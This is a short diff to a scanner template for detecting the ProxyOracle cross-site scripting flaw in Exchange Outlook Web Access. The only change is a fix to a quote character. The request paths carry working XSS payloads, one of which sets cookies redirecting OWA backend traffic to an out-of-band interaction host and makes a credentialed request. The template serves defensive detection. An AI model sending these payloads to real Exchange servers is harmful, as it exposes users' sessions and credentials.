--- a/vulnerabilities/other/proxyoracle-xss.yaml
+++ b/vulnerabilities/other/proxyoracle-xss.yaml
@@ -13,7 +13,7 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.domain)//"
-      - "{{BaseURL}}/owa/auth/frowny.aspx?app=mail&et=ServerError&esrc=MasterPage&err=\&estack=}}};document.cookie=`X-AnonResource=true`;document.cookie=`X-AnonResource-Backend={{interactsh-url}}%23~1941962752`;var+xhr=new+XMLHttpRequest();xhr.open(`GET`,`https://localhost/owa/auth/a.js`,true);xhr.withCredentials=true;xhr.send(null);//'
+      - "{{BaseURL}}/owa/auth/frowny.aspx?app=mail&et=ServerError&esrc=MasterPage&err=\&estack=}}};document.cookie=`X-AnonResource=true`;document.cookie=`X-AnonResource-Backend={{interactsh-url}}%23~1941962752`;var+xhr=new+XMLHttpRequest();xhr.open(`GET`,`https://localhost/owa/auth/a.js`,true);xhr.withCredentials=true;xhr.send(null);//"
       
     matchers:
       - type: status
